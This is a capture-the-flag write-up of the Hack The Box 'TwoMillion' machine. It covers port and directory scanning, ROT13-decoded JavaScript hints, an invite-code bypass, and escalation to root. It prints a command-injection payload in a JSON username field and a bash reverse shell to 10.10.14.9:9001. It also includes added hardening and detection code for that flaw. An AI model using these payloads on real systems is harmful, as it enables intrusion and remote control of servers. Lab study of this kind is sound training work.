Twomillion

- 5 mins read

author: sysevil


OS: Linux | Difficulty: Easy

Port Scanner

sudo nmap -p- -v -oG fullscan -T4 10.10.11.221
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-14 18:19 -03
Initiating Ping Scan at 18:19
Scanning 10.10.11.221 [4 ports]
Completed Ping Scan at 18:19, 0.15s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 18:19
Scanning 2million.htb (10.10.11.221) [65535 ports]
Discovered open port 80/tcp on 10.10.11.221
Discovered open port 22/tcp on 10.10.11.221
SYN Stealth Scan Timing: About 22.34% done; ETC: 18:21 (0:01:48 remaining)
SYN Stealth Scan Timing: About 40.95% done; ETC: 18:21 (0:01:28 remaining)
SYN Stealth Scan Timing: About 56.54% done; ETC: 18:22 (0:01:10 remaining)
Completed SYN Stealth Scan at 18:22, 153.85s elapsed (65535 total ports)
Nmap scan report for 2million.htb (10.10.11.221)
Host is up (0.13s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 154.11 seconds
           Raw packets sent: 69757 (3.069MB) | Rcvd: 79462 (5.171MB)

┌──(parallels㉿kali-gnu-linux-2023)-[~/Documents/htb/machines/2Milllion]
└─$ sudo nmap -p 22,80 -sV -A  -oG fullscanHTTP -T4 10.10.11.221
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-14 18:27 -03
Nmap scan report for 2million.htb (10.10.11.221)
Host is up (0.13s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open  http    nginx
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Hack The Box :: Penetration Testing Labs
|_http-trane-info: Problem with XML parsing of /evox/about
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT       ADDRESS
1   129.17 ms 10.10.14.1 (10.10.14.1)
2   130.94 ms 2million.htb (10.10.11.221)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.32 seconds

Dir Scanner

dirsearch -u  http://2million.htb -e php,asp,aspx,jsp,md,text,bak,zip,toml,conf
  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, md, text, bak, zip, toml, conf | HTTP method: GET | Threads: 25 | Wordlist size: 14139

Output File: /home/parallels/reports/http_2million.htb/_24-02-14_18-21-08.txt

Target: http://2million.htb/

[18:21:08] Starting: 
[18:21:20] 200 -    2KB - /404                                              
[18:21:39] 401 -    0B  - /api                                              
[18:21:39] 401 -    0B  - /api/v1                                           
[18:21:40] 301 -  162B  - /assets  ->  http://2million.htb/assets/          
[18:21:40] 403 -  548B  - /assets/                                          
[18:21:47] 403 -  548B  - /controllers/                                     
[18:21:48] 301 -  162B  - /css  ->  http://2million.htb/css/                
[18:21:54] 301 -  162B  - /fonts  ->  http://2million.htb/fonts/            
[18:21:56] 302 -    0B  - /home  ->  /                                      
[18:21:57] 403 -  548B  - /images/                                          
[18:21:57] 301 -  162B  - /images  ->  http://2million.htb/images/
[18:22:00] 403 -  548B  - /js/                                              
[18:22:00] 301 -  162B  - /js  ->  http://2million.htb/js/                  
[18:22:02] 200 -    4KB - /login                                            
[18:22:02] 302 -    0B  - /logout  ->  /                                    
[18:22:15] 200 -    4KB - /register                                         
[18:22:27] 301 -  162B  - /views  ->  http://2million.htb/views/       
  • /register/ is open

Vhost scanner

Nothing found here.

 ffuf -u http://2million.htb -H "Host: FUZZ.2million.htb"  -w /usr/share/wordlists/amass/subdomains.lst -fs 5 -mc 200

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://2million.htb
 :: Wordlist         : FUZZ: /usr/share/wordlists/amass/subdomains.lst
 :: Header           : Host: FUZZ.2million.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200
 :: Filter           : Response size: 5
________________________________________________

:: Progress: [8215/8215] :: Job [1/1] :: 306 req/sec :: Duration: [0:00:27] :: Errors: 0 ::

Infos.txt

  • Add the host name to /etc/hosts (the server redirects the bare IP to http://2million.htb/)
┌──(parallels㉿kali-gnu-linux-2023)-[~]
└─$ curl -I http://10.10.11.221
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 14 Feb 2024 21:16:33 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: http://2million.htb/

┌──(parallels㉿kali-gnu-linux-2023)-[~]
└─$ echo "10.10.11.221 2million.htb" | sudo tee -a /etc/hosts
10.10.11.221 2million.htb
  • Looking at the session cookie (PHPSESSID), this site is probably a PHP app.
  • Review the JavaScript code; it reveals additional routes.

  • Some strings in the JavaScript are ROT13-encoded
  • The following Python script decodes them

def decrypt_rot13(text):
    """Apply ROT13: shift each ASCII letter by 13 places and leave every
    other character unchanged. ROT13 is its own inverse, so the same
    function both encodes and decodes."""
    decrypted_text = ""
    for char in text:
        if 'a' <= char <= 'z':
            decrypted_text += chr((ord(char) - ord('a') + 13) % 26 + ord('a'))
        elif 'A' <= char <= 'Z':
            decrypted_text += chr((ord(char) - ord('A') + 13) % 26 + ord('A'))
        else:
            decrypted_text += char
    return decrypted_text

# String taken from the site's JavaScript
encrypted_text = "Va beqre gb trarengr gur vaivgr pbqr, znxr n CBFG erdhrfg gb /ncv/i1/vaivgr/trarengr"
decrypted_text = decrypt_rot13(encrypted_text)
print(decrypted_text)

# Output: In order to generate the invite code, make a POST request to /api/v1/invite/generate
  • Generate the invite

  • Login with the created user

  • Verify the docs of the api

  • Update your user as admin

  • Generate the config file

Based on the output, we can infer that the backend probably passes this value to a bash command.

Command injection


{"username":"sysevil; w #"}

Reverse shell as www-data

{"username":"sysevil; bash -c 'bash -i >& /dev/tcp/10.10.14.9/9001 0>&1' #"}
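The injection above works because the backend builds a shell command line from the username field. As an added example that is not part of this writeup and does not reproduce the machine's real backend (its code is unknown; the handler and the tool path are hypothetical), here is the pattern that prevents it: allowlist the username and pass it as a single argv element with no shell, plus a small check that flags request bodies carrying shell metacharacters so attempts like the ones above show up in request logs:

```python
import json
import re

# Hypothetical hardened handler for the "username -> shell command" flaw
# described above; the machine's real backend code is not known, and the
# tool path below is a placeholder, not something from the box.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")
SHELL_META = re.compile(r"[;&|`$<>(){}\\\n]")
CONFIG_TOOL = "/usr/local/bin/gen-config"  # placeholder path


def is_valid_username(username: str) -> bool:
    """Allowlist check: only letters, digits, '_', '.', '-' and 1-32 chars."""
    return isinstance(username, str) and USERNAME_RE.fullmatch(username) is not None


def build_config_argv(username: str) -> list:
    """Return the argv list a handler would hand to subprocess.run().

    Passing a list (no shell=True) makes the username one argument to the
    tool, never parsed as shell syntax, so "; w #" cannot become a second
    command. The allowlist check is kept as defence in depth.
    """
    if not is_valid_username(username):
        raise ValueError("username contains disallowed characters")
    return [CONFIG_TOOL, "--user", username]


def flag_suspicious_request(body: str) -> bool:
    """Detection helper for request logs: True when the JSON body's username
    carries shell metacharacters such as ';', '&', '|' or redirections."""
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return False
    value = data.get("username", "") if isinstance(data, dict) else ""
    return isinstance(value, str) and SHELL_META.search(value) is not None


# Constructed sample bodies; the second mirrors the injection payload above.
SAMPLE_BODIES = [
    '{"username":"sysevil"}',
    '{"username":"sysevil; w #"}',
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(body, "->", "SUSPICIOUS" if flag_suspicious_request(body) else "ok")
```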

user.txt

  • After getting a shell, search for credentials and check the .env file. This file contains the admin credentials.

root.txt

  • The machine does not have any usable sudo binaries for our user

But we have the Ubuntu version, so we can search for known exploits.

  • Transfer the files to the machine

  • Compile with make all and run the binary

  • Open another SSH connection, run ./exp from the same directory, and you are root